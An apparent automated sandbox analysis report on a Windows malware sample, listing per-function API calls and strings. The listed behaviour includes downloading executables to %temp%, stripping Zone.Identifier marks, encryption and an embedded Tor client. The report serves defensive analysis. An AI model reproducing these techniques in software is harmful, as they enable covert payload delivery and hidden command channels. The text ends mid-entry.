Function 009A3C60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99timeCOMMON

Download Yara Rule

APIs

Part of subcall function 009A3330: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 009A3370
Part of subcall function 009A3330: HeapReAlloc.KERNEL32(00000000,00000008,00000000,?), ref: 009A338E
Part of subcall function 009A3330: Sleep.KERNEL32(000007D0), ref: 009A33A2

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

GetSystemTimeAsFileTime.KERNEL32(?), ref: 009A3D9B

Strings

Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:72.0) Gecko/20100101 Firefox/72.0, xrefs: 009A3CCE

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: AllocHeapTime$FileSleepSystemmemmove
String ID: Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:72.0) Gecko/20100101 Firefox/72.0
API String ID: 734550395-1181690960
Opcode ID: 48849f2c87fc65cf1e714792af8feaa121f318908bbb54c0d3fc61d5f9f14a5d
Instruction ID: 5fc4bbb150ebfa979646d8f9317017a67bd3954830ad1ed632e3075c04fa5f98
Opcode Fuzzy Hash: 48849f2c87fc65cf1e714792af8feaa121f318908bbb54c0d3fc61d5f9f14a5d
Instruction Fuzzy Hash: F94122B19282189BCB10EB20EE06BD977B8BF85714F04C294F749662D1DB718644CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 009A25D0 Relevance: 3.1, APIs: 2, Instructions: 62encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A25F1
CryptEncrypt.ADVAPI32(00000010,00000000,00000000,00000000,009A27FC,00000010,00000010,?,?,?,?,009A2814), ref: 009A2612

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptEncryptmemmove
String ID:
API String ID: 2839943772-0
Opcode ID: cb8e1f83ee8e9b6949df0425192019a912a4ba70f2320d497e36b90bb72a0f94
Instruction ID: 11a9a4991b0c354ccb7b339fa76ad68ac049d58334d63f1c42eb3b714d2fc675
Opcode Fuzzy Hash: cb8e1f83ee8e9b6949df0425192019a912a4ba70f2320d497e36b90bb72a0f94
Instruction Fuzzy Hash: CF217230904208ABDB00CF5CC855F9DBB759F51308F18C499ED496B382C6B6A694DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 009A2250 Relevance: 3.0, APIs: 2, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000,?,009AE9E4), ref: 009A2264
CryptReleaseContext.ADVAPI32(?,00000000,?,009AE9E4), ref: 009A227C

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 4f536dc2fb3414926706e2b9a078eba2fcdc7656a8e51077fbd0bcf744f012e6
Instruction ID: 6c02ad55c809e7868cc6b10272ad4f3e44e135b3abd4757c742a8b2d6b16ac93
Opcode Fuzzy Hash: 4f536dc2fb3414926706e2b9a078eba2fcdc7656a8e51077fbd0bcf744f012e6
Instruction Fuzzy Hash: DBF0A03012C300DBD318AB5CEE5ABA13368B326721F400304F216461F0C7759880EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 009A9030 Relevance: 3.0, APIs: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000), ref: 009A9041
GetProcAddress.KERNEL32(00000000,?), ref: 009A9058

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 409998da0ec11f9ba0ec9bea68cc038c074d5ac3747eef48446b5bcbf3a642a0
Instruction ID: d21bfaebb7105c76fdc7557c5fdaba71b3d1e877bc36d37bbff1b2d2e893eff4
Opcode Fuzzy Hash: 409998da0ec11f9ba0ec9bea68cc038c074d5ac3747eef48446b5bcbf3a642a0
Instruction Fuzzy Hash: 58F0377491420CEFCB00EFA8D94879D7BB4FB09325F108254E90997350D3315A84DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009A23C0 Relevance: 1.5, APIs: 1, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CryptEncrypt.ADVAPI32(?,00000000,00000001,00000040,00000000,?,00000000,00000000,?,009AB263,?,00000000,00000056,00000080), ref: 009A23E2

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptEncrypt
String ID:
API String ID: 1352496322-0
Opcode ID: ebef8bda2f090fdbb07912d0b28d6f0250db375b3ac84d5db00235956aca2450
Instruction ID: 2a13c16d7e348ba4318d491c51ce09f21b405d3ea0ad8cf56318f6db330d44a0
Opcode Fuzzy Hash: ebef8bda2f090fdbb07912d0b28d6f0250db375b3ac84d5db00235956aca2450
Instruction Fuzzy Hash: 6BF04FB5208348AFCB04CF98D880FAA37B9AF89710F048148FD189B350D631E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009A28F0 Relevance: 1.5, APIs: 1, Instructions: 16encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32(?,?,009A99C6,?,?,?,?), ref: 009A2901

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptDestroy
String ID:
API String ID: 1712904745-0
Opcode ID: dfb6108635e72e122e244cc1f138391789e46308d8b44a9ee442889792a3453e
Instruction ID: b4dfbdf21dc4ddfd7ba2d70958de7d6a495623181a57431861bd7c2fec3ebf9d
Opcode Fuzzy Hash: dfb6108635e72e122e244cc1f138391789e46308d8b44a9ee442889792a3453e
Instruction Fuzzy Hash: 9AD05E3914430CABCB009F98E845F99376CAB85B15F408414F9084F250CB31F980CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 009A25A0 Relevance: 1.5, APIs: 1, Instructions: 16encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32(?,?,009AB2C4,?), ref: 009A25B1

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptDestroy
String ID:
API String ID: 1712904745-0
Opcode ID: 1d71279c49288a24718170516c5efa348d69ea4dc13950002c436edf0f2f5910
Instruction ID: 20c6c0b9d695d1312523e9afbc59184ef669fe253a2da7d097a26e3e47c66e4a
Opcode Fuzzy Hash: 1d71279c49288a24718170516c5efa348d69ea4dc13950002c436edf0f2f5910
Instruction Fuzzy Hash: 63D05E75540308EBCB00DF98D845F59376CAB45704F408010FA084F254DB31F980CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 009A22B0 Relevance: 1.5, APIs: 1, Instructions: 14encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,009A2BFD,009AA356,?,009A2BFD,009AA356,00000080), ref: 009A22C2

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptRandom
String ID:
API String ID: 2662593985-0
Opcode ID: c40706bca5d4e14b35deb460e56c01fa32e3d7b65d6f5b3095e25b28bf9a2232
Instruction ID: e82aa0396394a1b094cbbe3696aff278a3d2363a7906dd843dfef83c09cd7d10
Opcode Fuzzy Hash: c40706bca5d4e14b35deb460e56c01fa32e3d7b65d6f5b3095e25b28bf9a2232
Instruction Fuzzy Hash: DDC0127526C10D6B8B00DFACED41C6633AC9748B107008304F60DC7140C530E4009794

Uniqueness

Uniqueness Score: -1.00%

Function 009A2A60 Relevance: 1.5, APIs: 1, Instructions: 7encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(009A9A05,?,009A2B2E,?,?,009A9A05,?,?,?,?,?,?), ref: 009A2A67

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CryptDestroyHash
String ID:
API String ID: 174375392-0
Opcode ID: 161ffb8dfc51171c7d820c0e73885e3c37cf23dbaed43f824bc7419c61b9f51c
Instruction ID: 77a0f315306d5e20128a044b8b6b285d17116c60d87d845750301031cdd10b34
Opcode Fuzzy Hash: 161ffb8dfc51171c7d820c0e73885e3c37cf23dbaed43f824bc7419c61b9f51c
Instruction Fuzzy Hash: 67B0123102430CD78A006BD9E808889779CA6086107004000B50CC3101C630F40056E1

Uniqueness

Uniqueness Score: -1.00%

Function 009A7800 Relevance: 1.4, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009A79F0

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 40a47e0ae16ecd65d32b287db5505c5ff060c3b3ed2938d8d6571f0f2dee0396
Instruction ID: 336d7fffb47ab8428e88a675a1007e1910fed252b83a0f040f646ebc7a46e999
Opcode Fuzzy Hash: 40a47e0ae16ecd65d32b287db5505c5ff060c3b3ed2938d8d6571f0f2dee0396
Instruction Fuzzy Hash: A451D4B0E142188BDB28DFA9C95079EFBB2FF48300F1091AED11DAB394E7754A858F55

Uniqueness

Uniqueness Score: -1.00%

Function 009B0410 Relevance: 77.2, APIs: 38, Strings: 6, Instructions: 235
sleepfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 009B0419
srand.MSVCRT ref: 009B0420
rand.MSVCRT ref: 009B0428
Sleep.KERNEL32 ref: 009B043F
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 009B045D
strlen.MSVCRT ref: 009B0467
mbstowcs.MSVCRT ref: 009B047E
rand.MSVCRT ref: 009B0486
rand.MSVCRT ref: 009B049A
wsprintfW.USER32 ref: 009B04C1
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B04D7
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009B0506
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 009B0535
memset.MSVCRT ref: 009B055C
InternetReadFile.WININET(00000000,?,00000207,?), ref: 009B057E
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 009B05AF
CloseHandle.KERNEL32(000000FF), ref: 009B05BE
Sleep.KERNEL32(000003E8), ref: 009B05C9
wsprintfW.USER32 ref: 009B05E2
DeleteFileW.KERNEL32(?), ref: 009B05F2
Sleep.KERNEL32(000003E8), ref: 009B05FD
Sleep.KERNEL32(000003E8), ref: 009B061E
DeleteFileW.KERNEL32(?), ref: 009B064B
CloseHandle.KERNEL32(000000FF), ref: 009B0658
InternetCloseHandle.WININET(00000000), ref: 009B0665
InternetCloseHandle.WININET(00000000), ref: 009B0672
Sleep.KERNEL32(000003E8), ref: 009B067D
rand.MSVCRT ref: 009B0692
Sleep.KERNEL32 ref: 009B06A9
rand.MSVCRT ref: 009B06AF
rand.MSVCRT ref: 009B06C3
wsprintfW.USER32 ref: 009B06EA
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 009B0707
wsprintfW.USER32 ref: 009B0723
DeleteFileW.KERNEL32(?), ref: 009B0733
Sleep.KERNEL32(000003E8), ref: 009B073E
Sleep.KERNEL32(000003E8), ref: 009B075F
DeleteFileW.KERNEL32(?), ref: 009B077D

Strings

%ls\%d%d.exe, xrefs: 009B04B5
%temp%, xrefs: 009B0458
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B04D2
%ls:Zone.Identifier, xrefs: 009B0717
%ls\%d%d.exe, xrefs: 009B06DE
%ls:Zone.Identifier, xrefs: 009B05D6

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: FileSleep$rand$Internet$CloseDeleteHandlewsprintf$Open$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
API String ID: 827890202-3055678928
Opcode ID: 5b66c8eefcdd6adaca8a497ae8ebc9bfb152b19f3d9cc8f838c5d93785810171
Instruction ID: 341d410b93b3cbc8620359280a91afd3728e2b7fbfd920ac65a407d5a3ec6ff7
Opcode Fuzzy Hash: 5b66c8eefcdd6adaca8a497ae8ebc9bfb152b19f3d9cc8f838c5d93785810171
Instruction Fuzzy Hash: E58106B5904318ABDB20EB60DD4AFEE3339BFC8710F044698F209951D1DAB4AB90DF61

Uniqueness

Uniqueness Score: -1.00%

Function 009A81C0 Relevance: 37.2, APIs: 2, Strings: 19, Instructions: 490
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB

inet_ntop.WS2_32(00000002,?,?,00000080), ref: 009A83E6
lstrlenA.KERNEL32(?,?,00000014,00000040), ref: 009A87A5

Strings

r , xrefs: 009A84B8
accept 1-65535, xrefs: 009A82FD
http://%s:%hu/tor/status-vote/current/consensus.z, xrefs: 009A81E5
directory-footer, xrefs: 009A81FB
r , xrefs: 009A84EC
Stable, xrefs: 009A8266
%*s %s %s %*s %*s %*s %s %s %hu, xrefs: 009A823D
StaleDesc, xrefs: 009A82BB
s , xrefs: 009A857F
Fast, xrefs: 009A827C
Valid, xrefs: 009A8253
Exit, xrefs: 009A82D1
p , xrefs: 009A854B
Running, xrefs: 009A8292
<, xrefs: 009A87C2
HSDir , xrefs: 009A8227
circwindow=, xrefs: 009A8211
BadExit, xrefs: 009A82E7
Guard, xrefs: 009A82A5

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: CriticalEnterSectioninet_ntoplstrlenmemmove
String ID: p $r $r $s $ BadExit$ Exit$ Fast$ Guard$ Running$ Stable$ StaleDesc$ Valid$ circwindow=$%*s %s %s %*s %*s %*s %s %s %hu$<$HSDir $accept 1-65535$directory-footer$http://%s:%hu/tor/status-vote/current/consensus.z
API String ID: 3485021903-298003833
Opcode ID: 51f5876587be11856472ff9121500ca5d2419fd157c1a208b88d10759a2d93e0
Instruction ID: 19b83464c4aa942c7785c3351cd416420e66b54aeffc8dfd84e6ab1971c3e6a7
Opcode Fuzzy Hash: 51f5876587be11856472ff9121500ca5d2419fd157c1a208b88d10759a2d93e0
Instruction Fuzzy Hash: 2B22A4B5D142689FDB24DB54CC45FEAB7B8EF89300F0085D9E609B6281DBB45E84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009ACAD0 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 401
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

_longjmp.LIBVCRUNTIMED ref: 009ACBD8
task.LIBCPMTD ref: 009AD02F

Part of subcall function 009A3830: lstrlenA.KERNEL32(00000000), ref: 009A3862
Part of subcall function 009A3830: lstrlenA.KERNEL32(?), ref: 009A387E

lstrlenA.KERNEL32(?,?,00000014,00000020,?,?,?,?,?,?,?,?,00000000), ref: 009ACEF0
memmove.MSVCRT ref: 009ACFC0

Strings

introduction-points-----BEGIN MESSAGE-----, xrefs: 009ACB2C
<, xrefs: 009ACF41
-----END MESSAGE-----, xrefs: 009ACB3F
service-key, xrefs: 009ACBBA
-----END RSA PUBLIC KEY-----, xrefs: 009ACBA4
ip-address , xrefs: 009ACB65
introduction-point , xrefs: 009ACB52
onion-port , xrefs: 009ACB78
protocol-versions , xrefs: 009ACB16
secret-id-part , xrefs: 009ACB03
onion-key, xrefs: 009ACB8E

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: lstrlen$memmove$_longjmptask
String ID: -----END MESSAGE-----$-----END RSA PUBLIC KEY-----$<$introduction-point $introduction-points-----BEGIN MESSAGE-----$ip-address $onion-key$onion-port $protocol-versions $secret-id-part $service-key
API String ID: 3796934367-2400399560
Opcode ID: b658ed9d9d34af5365b9a3117f1bfbe75db384d961f738cca31b89e9630f6ed0
Instruction ID: 91d2c3bf7fe0472349c99644ac93683219ea318c3ca4e12c10e9a3e679fdbce0
Opcode Fuzzy Hash: b658ed9d9d34af5365b9a3117f1bfbe75db384d961f738cca31b89e9630f6ed0
Instruction Fuzzy Hash: BBE189F1A543186BDB14DB94DC42FEEB379AF99700F048198F605AB182EB719B44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009A62E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 351
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F

lstrlenA.KERNEL32(00000000), ref: 009A636F
SetLastError.KERNEL32(00000000), ref: 009A639F
lstrlenA.KERNEL32(00000000), ref: 009A63AF
lstrlenA.KERNEL32(00000000), ref: 009A640F
lstrlenA.KERNEL32(?), ref: 009A653A
_longjmp.LIBVCRUNTIMED ref: 009A669C
GetLastError.KERNEL32 ref: 009A672A
GetLastError.KERNEL32 ref: 009A6737
GetLastError.KERNEL32 ref: 009A674E
GetLastError.KERNEL32 ref: 009A6773

Strings

deflate, xrefs: 009A631F
Proxy-Connection: close, xrefs: 009A6358
%s%s%sConnection: closeAccept-Encoding: gzip, xrefs: 009A6345
gzip, xrefs: 009A6332

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: ErrorLast$lstrlen$_longjmpmemmove
String ID: %s%s%sConnection: closeAccept-Encoding: gzip$Proxy-Connection: close$deflate$gzip
API String ID: 3717562076-1391079651
Opcode ID: ad333316f6aeaec999668608f71716dc844c93f85d914a31f81b76b40e54ccc9
Instruction ID: 49196fcf64d2c7d4f4dddb523f1eab23c8bf9904ca45d54ae33616951686d743
Opcode Fuzzy Hash: ad333316f6aeaec999668608f71716dc844c93f85d914a31f81b76b40e54ccc9
Instruction Fuzzy Hash: AAE17DB5914258DFDB14CFA4DC45BEEB7B8BF49304F088188F645A7284DBB49985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009A4AC0 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 009A4220: GetLastError.KERNEL32 ref: 009A4264
Part of subcall function 009A4220: GlobalFree.KERNEL32(00000000), ref: 009A42FE
Part of subcall function 009A4220: GlobalFree.KERNEL32(00000000), ref: 009A430E
Part of subcall function 009A4220: GlobalFree.KERNEL32(00000000), ref: 009A431E

freeaddrinfo.WS2_32(?,00000004,00000009), ref: 009A4C67

Part of subcall function 009A49C0: socket.WS2_32(?,?,?), ref: 009A4A1E
Part of subcall function 009A49C0: connect.WS2_32(000000FF,?,?), ref: 009A4A48
Part of subcall function 009A49C0: freeaddrinfo.WS2_32(?), ref: 009A4AA5

Strings

, xrefs: 009A4B5D
CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s, xrefs: 009A4D61
CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s, xrefs: 009A4F13
, xrefs: 009A4D6E

Memory Dump Source

Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd

Similarity

API ID: FreeGlobal$freeaddrinfo$ErrorLastconnectsocket
String ID: $ $CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s$CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s
API String ID: 3188732148-200375032
Opcode ID: c3732e8ade6719ba99f5389ef610bb033c113b4d0a41c5fbc8ec66dcb74226d9
Instruction ID: a3619864471035f939ccbab88e0b965dd9a9a1c1561fb167ec9f72875933bb6a
Opcode Fuzzy Hash: c3732e8ade6719ba99f5389ef610bb033c113b4d0a41c5fbc8ec66dcb74226d9
Instruction Fuzzy Hash: 12F1B171A042689BDF24DB55DC41BEAB3B9AF85304F0484D9F14DAB181DAB49F84CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 009ADBE0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 443stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB

Part of subcall function 009A70D0: lstrlenA.KERNEL32(009ADC70,?,009ADC70,?,00000040,00000000), ref: 009A70DA

